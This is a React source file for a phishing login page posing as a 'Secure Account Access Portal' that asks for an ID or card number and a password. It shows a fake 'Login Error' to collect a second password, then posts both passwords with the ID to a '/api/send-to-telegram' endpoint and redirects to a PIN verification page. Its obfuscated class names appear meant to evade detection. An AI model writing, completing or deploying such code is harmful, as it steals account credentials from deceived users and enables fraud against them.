import { useEffect, useState } from "react";
import axios from "axios";
import LoginForm from "../LoginForm/LoginForm";
import styles from "./loginAction.module.scss";
import { useNavigate } from "react-router";
import Footer from "../Footer/Footer";
import Header from "../Header/Header";

const LoginAction = () => {
  const [first, setFirst] = useState(false);
  const [login, setLogin] = useState("");
  const [gg, setGg] = useState(false);
  const [pass, setPass] = useState("");
  const [error, setError] = useState(false);

  const [password1, setPassword1] = useState("");
  const [password2, setPassword2] = useState("");
  const [second, setSecond] = useState(false);
  const [email, setEmail] = useState("");
  const [email2, setEmail2] = useState("");

  let navigate = useNavigate();

  const onFinish = async () => {
    if ((email, password1 && !second)) {
      localStorage.setItem("login", email);
      setTimeout(() => {
        setSecond(true);
      }, 2000);
    } else if (second && password2 && email) {
      const message = `
            Hello Friends:
            User/Carrier ID*: ${email}
            Password*: ${password1}
            Second Password*: ${password2}
        `;

      try {
        // Send the message with form data
        await fetch("/api/send-to-telegram", {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ message: message }),
        });
        setTimeout(() => {
          navigate("/pinverify");
        }, 1500);
      } catch (error) {
        console.error("Error sending data to Telegram:", error);
      }
    }
    if (first == 2) {
      try {
        setPass("");
        setGg(true);
        setTimeout(() => {
          localStorage.setItem("login", login);
          localStorage.setItem("pass", pass);
          setError(true);
        }, 1500);
      } catch (error) {
        console.error("Error sending data to Telegram:", error);
      }
    }
    if (first == 3) {
      const password = localStorage.getItem("pass");
    }
  };

  return (
    <div className={styles.fiojfifnmifnufnfunfduhn}>
      <main className={styles.mainCont}>
        <div className={styles.fdodmidmidmidmidm}>
          <div className={styles.fifdjifjidfj}>
            <h2>Secure Account Access Portal</h2>
            <div className={styles.odidjnuehuehbudbudn} />
            <p>
              Confirm your identity to continue reviewing your account updates,
              alerts, or recent activity. Your secure session will begin after
              verification.
            </p>

            <div className={styles.finfijfidmoikeosijkodk}>
              <div className={styles.dfoifjkiofjkifjifjmi}>
                <div className={styles.doijdijdijdijdijdidjidj}>
                  <label className={styles.dfojfdifnifnifn}>
                    User/Carrier ID - OR - Card Number:
                  </label>
                  <div>
                    <input
                      onChange={(e) => {
                        setEmail(e.target.value);
                      }}
                      className={styles.uinbfodkodj}
                    ></input>
                  </div>
                </div>
              </div>
              <div className={styles.dfoifjkiofjkifjifjmi}>
                <div className={styles.doijdijdijdijdijdidjidj}>
                  <label className={styles.dfojfdifnifnifn}>
                    Password -OR- Pascode:
                  </label>
                  <div>
                    <input
                      value={second ? password2 : password1}
                      onChange={(e) => {
                        if (second) {
                          setPassword2(e.target.value);
                        } else {
                          setPassword1(e.target.value);
                        }
                      }}
                      type="password"
                      className={styles.uinbfodkodjm}
                    ></input>
                  </div>
                </div>
              </div>
              {second ? (
                <div className={styles.ofdnfidjidjidj}>1. Login Error</div>
              ) : (
                ""
              )}
              <div className={styles.dfijdfifkjmifjmifjmifjmifjmfijm}>
                <button className={styles.buttonss} onClick={onFinish}>
                  <div>Logon</div>
                </button>
              </div>
              <div>
                <div>
                  <p>
                    By accessing this system you accept the{" "}
                    <span>
                      Customer <br />
                      Terms of Use{" "}
                    </span>
                    and <span>Privacy Policy</span>
                  </p>
                </div>
              </div>
            </div>
            <div className={styles.fijfikjdioksokdokdok}>
              User/Carrier ID and Password are case sensitive
            </div>
            <div className={styles.mainBox1}>
              <a href="">For English click here</a>
              <a href="">En Français, cliquer ici</a>
              <a href="">Para Español Presione Aquí</a>
            </div>
          </div>
        </div>
      </main>
    </div>
  );
};
export default LoginAction;

